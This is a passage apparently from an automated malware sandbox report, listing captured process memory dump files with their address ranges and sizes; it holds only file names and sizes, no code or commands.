                                                                              100KB

                                                                            • memory/1036-74-0x00007FFDCC050000-0x00007FFDCC077000-memory.dmp

                                                                              Filesize

                                                                              156KB

                                                                            • memory/1036-70-0x00007FFDC85F0000-0x00007FFDC8C53000-memory.dmp

                                                                              Filesize

                                                                              6.4MB

                                                                            • memory/1036-81-0x00007FFDCE6F0000-0x00007FFDCE709000-memory.dmp

                                                                              Filesize

                                                                              100KB

                                                                            • memory/1036-82-0x00007FFDC8EC0000-0x00007FFDC8F73000-memory.dmp

                                                                              Filesize

                                                                              716KB

                                                                            • memory/1036-292-0x00007FFDC8D50000-0x00007FFDC8E1E000-memory.dmp

                                                                              Filesize

                                                                              824KB

                                                                            • memory/1036-293-0x00000166987C0000-0x0000016698CF3000-memory.dmp

                                                                              Filesize

                                                                              5.2MB

                                                                            • memory/1036-78-0x00007FFDCC020000-0x00007FFDCC04B000-memory.dmp

                                                                              Filesize

                                                                              172KB

                                                                            • memory/1036-79-0x00007FFDCC6D0000-0x00007FFDCC6DD000-memory.dmp

                                                                              Filesize

                                                                              52KB

                                                                            • memory/1036-76-0x00007FFDCC310000-0x00007FFDCC324000-memory.dmp

                                                                              Filesize

                                                                              80KB

                                                                            • memory/2848-91-0x000001A2C23C0000-0x000001A2C23E2000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/2924-211-0x000001F532840000-0x000001F532848000-memory.dmp

                                                                              Filesize

                                                                              32KB